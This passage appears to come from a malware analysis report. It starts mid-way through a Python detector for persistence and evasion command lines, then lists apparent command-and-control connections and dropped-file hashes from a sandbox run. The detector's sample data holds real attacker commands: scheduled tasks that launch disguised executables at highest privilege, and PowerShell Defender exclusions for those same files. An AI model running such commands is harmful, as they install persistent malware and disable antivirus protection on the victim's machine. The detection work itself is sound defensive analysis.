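        m = WMIC_HW_RE.search(cmd)
        if m:
            findings.append(Finding("wmic-hw-fingerprint", m.group(1), cmd))
        if W32TM_RE.search(cmd):
            findings.append(Finding("w32tm-delay", "time-sync against localhost used as a sleep", cmd))
    return findings


def rule_counts(findings):
    """Number of findings per rule, for a quick triage summary."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


def excluded_persistence_paths(findings):
    """Paths that are both a scheduled-task target and a Defender exclusion.
    A benign installer rarely does both, so this pairing is the strongest signal here."""
    tasks = {f.detail.split(" -> ")[-1].lower() for f in findings if f.rule.startswith("schtasks-")}
    excluded = {f.detail.lower() for f in findings if f.rule == "defender-exclusion"}
    return sorted(tasks & excluded)


# Constructed sample: lines copied from the process list above plus one benign task.
SAMPLE_CMDLINES = [
    r'''schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f''',
    r'''schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Templates\csrss.exe'" /f''',
    r'''schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\sppsvc.exe'" /rl HIGHEST /f''',
    r""""powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\taskhostw.exe'""",
    r""""powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\csrss.exe'""",
    r"wmic diskdrive get model,serialnumber",
    r"wmic path Win32_Keyboard get Description,DeviceID",
    r"w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2",
    # benign control line (constructed): real cmd.exe in System32, daily schedule
    r'''schtasks.exe /create /tn "NightlyCleanup" /sc DAILY /st 02:00 /tr "C:\Windows\System32\cmd.exe /c del /q C:\Temp\*.log" /f''',
]

if __name__ == "__main__":
    found = analyze(SAMPLE_CMDLINES)
    for f in found:
        print(f"{f.rule:24} {f.detail}")
    print("task target also excluded from Defender:", excluded_persistence_paths(found))
```

Run as-is it prints the findings for the constructed sample; on a real host the same functions can be fed process-creation command lines from Sysmon Event ID 1 or Security Event ID 4688. The correlation in excluded_persistence_paths is the part worth keeping: a path that is at once a scheduled-task target and a Defender exclusion is a far stronger indicator than either observation alone, and on this sample it returns exactly the two paths the chain both schedules and excludes.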
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25350.client.sudorat.top | udp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| N/A | 127.0.0.1:1111 | N/A | tcp |
| US | 8.8.8.8:53 | 729231cm.n9shteam1.top | udp |
| US | 8.8.8.8:53 | 25350.client.sudorat.ru | udp |
| FR | 37.44.238.250:80 | 729231cm.n9shteam1.top | tcp |
| US | 8.8.8.8:53 | 250.238.44.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117813cm.n9shteam.in | udp |
| FR | 37.44.238.250:80 | 117813cm.n9shteam.in | tcp |
| RU | 31.44.184.52:25350 | N/A | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| US | 8.8.8.8:53 | 25350.client.sudorat.ru | udp |
| US | 8.8.8.8:53 | 200.254.1.23.in-addr.arpa | udp |
| RU | 31.44.184.52:25350 | N/A | tcp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| US | 8.8.8.8:53 | 25350.client.sudorat.ru | udp |
| US | 8.8.8.8:53 | 179.254.1.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| RU | 31.44.184.52:25350 | N/A | tcp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| US | 8.8.8.8:53 | 25350.client.sudorat.ru | udp |
| RU | 31.44.184.52:25350 | N/A | tcp |
Files
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
| MD5 | 10e817a4d5e216279a8de8ed71c91044 |
| SHA1 | 97c6fb42791be24d12bd74819ef67fa8f3d21724 |
| SHA256 | c60f74f6e164049e683a5f01b8cfea24aa85cbf6c7b31b765cbad16d8ab0d7b2 |
| SHA512 | 34421a517f5f1909afd694d24e22cafad9930725df964ba9c80666e9f0f2dcfdd2a254dcf6699e5797296ec3ae611593563779df05e3a617c7f8679a154dfd37 |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe
| MD5 | a05e26d89c5be7e2c6408b09cd05cf74 |
| SHA1 | c24231c6301f499b35441615b63db6969a1762fd |
| SHA256 | 05628dfff22e15b219a711cf52a2c87521170853979f00fcd014cf164656418e |
| SHA512 | 8c8733f12dd71cfafd2edbfad487279d6ed971eb119b1cde92a905f4658a9b090f831f42ef2228a4f6c64071a1f54fb74708438b4361e317e36016897577913d |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
| MD5 | bc7804fca6dd09b4f16e86d80b8d28fa |
| SHA1 | a04800b90db1f435dd1ac723c054b14d6dd16c8a |
| SHA256 | 1628864ab0bafe8afea2ad70956b653550dab3db7c4cdf6f405e93a6c2441dce |
| SHA512 | 7534ac0a215f02af85bdf2b414e23face0570943f8820e7bfe97ea274ccd1a01618556e93b7465c2d9fbb0bcde5e97fab9e9b6bddd366554277ef308cde3a83c |
memory/2824-28-0x00000000728FE000-0x00000000728FF000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
| MD5 | e8c32cc88db9fef57fd9e2bb6d20f70b |
| SHA1 | e732b91cd8ac16fa4ce8ad9e639bf21d69f6bb45 |
| SHA256 | f787ce198538b1c0b2bfce8ce5297e34152cf6deebe559df6887f65c72a081a4 |
| SHA512 | 077307d42438f2b72d62ce9e35c67c09e1375c2e203e6d6d455c6c8861c6442b3d82f1345b6c76940f5e8015fe93491158a59b102fabd139c742d75c2c42ba7a |
memory/2824-36-0x0000000000AA0000-0x0000000000D9E000-memory.dmp
memory/2824-45-0x00000000056B0000-0x00000000056BE000-memory.dmp
memory/336-46-0x0000000000400000-0x0000000000DF4000-memory.dmp
memory/2824-48-0x0000000005960000-0x00000000059BC000-memory.dmp
memory/2824-50-0x0000000006050000-0x00000000065F4000-memory.dmp
memory/2824-51-0x0000000005AA0000-0x0000000005B32000-memory.dmp
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe
| MD5 | d47062c8738a534fc931c0f341a61773 |
| SHA1 | c1175037a0e96363da56bc9d8abdb726cddc74fc |
| SHA256 | 484cc22b88e1eaae619f948e96812ebf70275f9e6408e2e3dbd8af827ac5199a |
| SHA512 | 9de6dcf7944ec9f2ff44c8fdbe562a6755c2af9800028b01fb0969921e6ef969c1ecc6e2ab129f191ac5feeaa9aa30cf436489dfee8e94433d6678a9942ffe39 |
memory/2824-53-0x0000000005F90000-0x0000000005FA2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe.config
| MD5 | a2b76cea3a59fa9af5ea21ff68139c98 |
| SHA1 | 35d76475e6a54c168f536e30206578babff58274 |
| SHA256 | f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839 |
| SHA512 | b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad |
memory/2168-69-0x00000000053D0000-0x00000000053E2000-memory.dmp
memory/2168-70-0x0000000005890000-0x00000000058DE000-memory.dmp
memory/2168-71-0x00000000061F0000-0x000000000628C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MpDefenderCoreProtion.exe.log
| MD5 | 663b8d5469caa4489d463aa9bc18124f |
| SHA1 | e57123a7d969115853ea631a3b33826335025d28 |
| SHA256 | 7b4fa505452f0b8ac74bb31f5a03b13342836318018fb18d224ae2ff11b1a7e8 |
| SHA512 | 45e373295125a629fcc0b19609608d969c9106514918bfac5d6b8e340e407434577b825741b8fa6a043c8f3f5c1a030ba8857da5f4e8ef15a551ce3c5fe03b55 |
memory/4504-76-0x00000000058D0000-0x00000000058E8000-memory.dmp
memory/4504-77-0x0000000005960000-0x0000000005970000-memory.dmp
memory/4504-78-0x0000000006590000-0x000000000659A000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat
| MD5 | fbef3b76368e503dca520965bb79565f |
| SHA1 | 9a1a27526b8b9bdaae81c5301cd23eb613ea62ba |
| SHA256 | bcb2af67a4ea1e6aa341cf3141941dbe7b17f1911e7f20aba46552571f99c9f3 |
| SHA512 | 2b99bc9a945b6d9a2c0d3206dce9221eb7f4a2040c5096909d60c3278254c52b39a28dd18dd4e005eff0ebd7e7cba6dd3a6a94ea8a7d7598da3001da174db3f5 |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
| MD5 | 00c4245522082b7f87721f9a26e96ba4 |
| SHA1 | 993a8aa88436b6c62b74bb399c09b8d45d9fb85b |
| SHA256 | a728f531427d89c5b7691f989e886df57d46f90d934448e6dabf29d64d0662bf |
| SHA512 | fdd8d2444b28883face793f6ea77913c2096a425e6101202536ea001c3df5e76a60a01673ee7a52eae827a12299b2727002895395315db190ec82ae11a68559f |
memory/4312-83-0x0000000000CA0000-0x0000000000CA8000-memory.dmp
memory/4312-84-0x000000001B850000-0x000000001B954000-memory.dmp
memory/4312-86-0x0000000002D10000-0x0000000002D1E000-memory.dmp
memory/4312-88-0x0000000002D60000-0x0000000002D7C000-memory.dmp
memory/4312-89-0x000000001B7E0000-0x000000001B830000-memory.dmp
memory/4312-91-0x0000000002D80000-0x0000000002D98000-memory.dmp
memory/4312-93-0x0000000002D20000-0x0000000002D2E000-memory.dmp
memory/4312-95-0x0000000002D30000-0x0000000002D3C000-memory.dmp
memory/4312-97-0x0000000002D40000-0x0000000002D4E000-memory.dmp
memory/4312-99-0x0000000002DA0000-0x0000000002DAC000-memory.dmp
memory/4312-101-0x000000001B7D0000-0x000000001B7DC000-memory.dmp
memory/4312-103-0x000000001B830000-0x000000001B83E000-memory.dmp
memory/4312-105-0x000000001BA50000-0x000000001BA5C000-memory.dmp
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat
| MD5 | 2fa8decc3dafe6f196f6c28769192e7c |
| SHA1 | 69f4e0cf41b927634a38b77a8816ca58c0bfb2de |
| SHA256 | 7e40eb542d164397c0bf17a47c8f0db79e7028299e9f180d38505220fd2cfb30 |
| SHA512 | c9fb6c2ac2441ff14673ccaa3f1d5e703356c093353992d302d34df6c9e26a85aba6760c3b98f0cd0ada45183c55b2e5cabc09978ca084077dd71743ca9fdbc1 |
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
| MD5 | 52c95032ff8b8c3d4dfd98e51d8f6f58 |
| SHA1 | e841a32cb07adaad4db35b1f87b5df6e019eb9af |
| SHA256 | 39b35293e7efaa4cb94028e59872013bef4065788fef9fe3cd3206a8aee711e4 |
| SHA512 | a1177740ffbb476fb11f8112d98cabe3012ee3d54f2f848bb22ea99b53bd3526bf59065951fb6ef29f29408ab2fd90c942de65fe16d66a098abce8ba5d7d4e00 |
memory/2180-121-0x00000000003C0000-0x000000000051A000-memory.dmp
memory/2180-122-0x0000000002620000-0x000000000263C000-memory.dmp
memory/2180-123-0x0000000002640000-0x0000000002656000-memory.dmp
memory/2180-124-0x0000000002660000-0x0000000002670000-memory.dmp
memory/2180-126-0x0000000002680000-0x000000000268C000-memory.dmp
memory/2180-125-0x0000000002670000-0x000000000267E000-memory.dmp
memory/336-135-0x0000000000400000-0x0000000000DF4000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\igghsuce\igghsuce.cmdline
| MD5 | 1a2ee3a3487267d6810a536332371ddc |
| SHA1 | 0d07c211fa946644073202e25edf27cfe6607258 |
| SHA256 | 08798cfa1b05f38668bf19f39678f281c432590b1c5a614919905324899a2010 |
| SHA512 | 8d117a5936a3c9fcc128e94de0c4a1e5483f5a9b6436f818ff51c38f96db3e1f27a905322a0402087823413377561f7cbf25205c169699e303358bedffbd6036 |
\??\c:\Users\Admin\AppData\Local\Temp\igghsuce\igghsuce.0.cs
| MD5 | 42da9bd77f4212d41a0c0829aa24dbef |
| SHA1 | 2243674d35b802737c52ce7763fc0c3a993d08b1 |
| SHA256 | 6f59a64a07b34e6e41fb96093d59a2cb5fe768f292ae184fad01ee6b3f4535b1 |
| SHA512 | 234ef962a3a1f6c722631ac26119f890457cb809109ae8349217075eb23d3dcb71dd5670dae6fcdde5230a6343a30cdbbd811ad9ecf7747abf844d94040d5a72 |
\??\c:\Windows\System32\CSCD8D644E09FC241AA8996A8F16E59FB8.TMP
| MD5 | d544bac668d308d2aba58ded2c13d82d |
| SHA1 | e5dd50ef24d5c16629092f9290661a92387773b3 |
| SHA256 | 84b05d56c45fd0382410fcd59e16aeef467ed0a455595dda88386dd5c87d7a02 |
| SHA512 | 0826de2bc95d93dde2c540d2d768a0188481ee88f1da79f9c7d70d7ccd3c8715b8f1d62053f84d14f19e4d2b0a13e67084d970a158464e6223e340eb0733e1b0 |
C:\Users\Admin\AppData\Local\Temp\RESBA86.tmp
| MD5 | 0748262b111d6be414544e5921787b88 |
| SHA1 | 0375a8dc4a74f253ce1d33848e9fbccd82bf5cd7 |
| SHA256 | 2425b92cd8c236a407010ace4b8fe70385722bef76e2b52e3c378ea063dd7eab |
| SHA512 | 353795e45f1fad6df297a1f60540eccef1aa5bcbef8051a3da82834d4bb6d2664c567eff3cd8c026671f901521459dd8be7cc22366a67117f2479617e6421098 |
memory/988-183-0x000002E477BF0000-0x000002E477C12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtwzinkm.ywp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\k0tbFJWvqp.bat
| MD5 | 872623011b29ff61b30e5774abfa7c3f |
| SHA1 | df0177c676805c85604948980043a312ad56c9d9 |
| SHA256 | 5b822cf6541581900e49449634e8b6dd615bbdd3603a111a97eb93638b3928a0 |
| SHA512 | b290a30926c2619fead5cb0b27c5141625da2482823e7a5a09d77704766e88285e0935a977a3b9acd21b388acccf34ce3695924af30ad1cd34138d8e530d9e13 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\runtimesvc.exe.log